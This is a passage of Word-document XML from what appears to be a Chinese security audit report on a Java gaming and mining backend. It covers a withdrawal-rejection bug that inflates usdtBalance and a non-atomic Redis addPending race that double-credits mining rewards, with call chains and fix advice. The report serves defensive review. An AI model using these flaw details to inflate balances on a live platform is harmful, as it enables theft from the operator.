          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的业务逻辑（如余额展示、等级判定、奖励分发），攻击者可进一步利用被虚增的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 触发异常业务收益</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修复建议（参考）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>将余额操作修正为真正的"解冻"语义：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正确逻辑：仅恢复 usdtUsableBalance，usdtBalance 不变</w:t>
              <w:br/>
              <w:t>account.setUsdtUsableBalance(usable.add(refundAmount));  // 解冻：归还可用余额</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>// account.setUsdtBalance 不需要变更（提现从未真正发出，总余额始终未减）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1161"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">是否需要登录：是（需要管理员 Token，通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminAuthFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 鉴权）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1162"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：管理后台操作员，具备提现审核拒绝权限（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 2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受影响调用链（3 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1163"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>WithdrawManageController.java.reject → WithdrawManageService.java.reject → WithdrawManageService.java.applyRejectedImport → UserAccountRepository.java.findByUserIdForUpdate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1164"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>WithdrawManageController.java.reject → WithdrawManageService.java.reject → WithdrawManageService.java.applyRejectedImport → WithdrawApplyRecord.java.getStatus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1165"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>WithdrawManageController.java.reject → WithdrawManageService.java.reject → WithdrawManageService.java.applyRejectedImport → UserAccount.java.getUsdtUsableBalance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audit_m261_1072_reject_ctrl-path1of14.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m261_1089_reject_ctrl-path4of14.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m261_1140_reject_ctrl-path11of14.md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：RedisMiningBalanceCache.java#addPending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_55" w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞54：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>addPending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 非原子 Redis 读改写 — 多实例并发导致挖矿 pending 余额双倍累积</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="116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：RedisMiningBalanceCache.addPending 非原子 read-modify-write 导致挖矿奖励 pending 余额膨胀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="116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src/main/java/com/gameBack/mjservice/common/helper/RedisMiningBalanceCache.java:addPending</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="116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：并发设计缺陷 / 资金安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="116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17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：无（服务端 Scheduler 定时触发，无需任何用户操作）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1171"/>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addPending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法对 Redis 中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段的更新是一个由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5 步独立 Redis 操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">组成的非原子序列：①读 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ②读 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>hashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ③本地计算 → ④写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → ⑤写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastTs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。整个过程没有 Redis 分布式锁（如 Redisson）、Redis Lua 脚本或 WATCH/MULTI/EXEC 事务保护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>水平扩展（多 JVM 实例）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">部署场景下，所有实例均独立运行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Scheduled(fixedRate = TICK_INTERVAL_MS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调度器，每 5 秒为全体在线用户执行一次 tick。当两个实例并发处理同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 时，存在以下竞态窗口：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时间轴：</w:t>
              <w:br/>
              <w:t xml:space="preserve">  实例A: [op1:读lastTs=T0] ─── [op2:读pending=P0] ─── [op4:写pending=P0+HR*5] ─── [op5:写lastTs=T1]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  实例B:    [op1:读lastTs=T0]                             ^                   [op2:读pending=P0+HR*5] ─── [op4:写pending=P0+HR*10]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                                         │</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">                         实例B的op2发生在实例A的op4之后（如GC暂停、负载抖动期间）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键竞态条件同时成立：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1172"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实例 B 的 `op1`（读 `lastTs`）发生在实例 A 的 `op5`（写 `lastTs`）之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 两个实例均认为需要对该用户计算本轮 tick 奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1173"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实例 B 的 `op2`（读 `pending`）发生在实例 A 的 `op4`（写 `pending`）之后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 实例 B 读到已经包含实例 A 奖励的 pending 值，并在此基础上再叠加一次奖励</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">最终 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>P0 + 2 × HR × capped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，同一 5 秒 tick 周期的挖矿奖励被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>双倍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>计入用户 pending 余额。该 pending 值在后续结算时将兑换为实际余额，造成平台虚拟货币超发。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入（第 4 步）与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastTs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 写入（第 5 步）的非原子性还存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>部分失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">场景：若实例在写完 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>pending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之后、写 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastTs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之前宕机，下次 tick 将以旧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastTs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 重新计算经过时间，再次追加奖励（最多为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TICK_CAP_SECONDS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 秒量）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1174"/>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tickMiningFromCache（5秒定时触发，多实例各自运行）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    └─ balanceCache.tick(userId)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">         └─ addPending(userId, elapsedSeconds)   ← 竞态漏洞点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1175"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>tickMiningFromCache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sessionRegistry.getActiveUserIds()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 获取所有在线用户，逐一调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>tick(userId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1176"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>tick</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 从 Redis 读取 </w:t>
      </w:r>
      <w:r>
